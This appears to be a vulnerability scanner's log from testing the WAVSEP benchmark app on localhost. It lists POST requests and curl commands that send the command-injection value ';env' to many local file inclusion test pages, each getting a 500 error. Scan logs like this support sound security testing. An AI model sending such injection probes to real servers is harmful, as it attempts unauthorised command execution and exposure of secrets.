curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
